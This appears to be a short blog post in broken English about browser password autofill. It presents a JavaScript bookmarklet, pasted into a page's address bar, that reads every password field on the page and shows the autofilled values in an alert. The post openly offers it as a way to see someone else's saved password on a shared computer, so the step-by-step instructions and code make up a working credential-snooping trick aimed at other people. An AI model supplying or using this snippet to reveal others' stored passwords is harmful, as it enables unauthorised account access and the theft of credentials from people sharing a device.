Now days almost all types of browser comes with the features which allow us to save username and password of website so when we try to access that particular website browser auto filed with the previously stored username and password.
Its very nice features to save time but its secure only in personal computer if your device is used by other persons than its really bad idea to save password.
So i will show how to see the save password of some one by just a simle java script code.
1)open the page where you want to see the saave password(see below)
2)Now just copy and drag this code to your desired page
javascript:(function(){var s,F,j,f,i; s =
""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for
(i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() ==
"password") s += f[i].value + "\n"; } } if (s)
alert("Passwords in forms on this page:\n\n" + s); else
alert("There are no passwords in forms on this page.");})();
3)Now you will able to see the password (see like this )
4) Enjoy and yes don't try to access my fb account you will probably not able login
0 comments: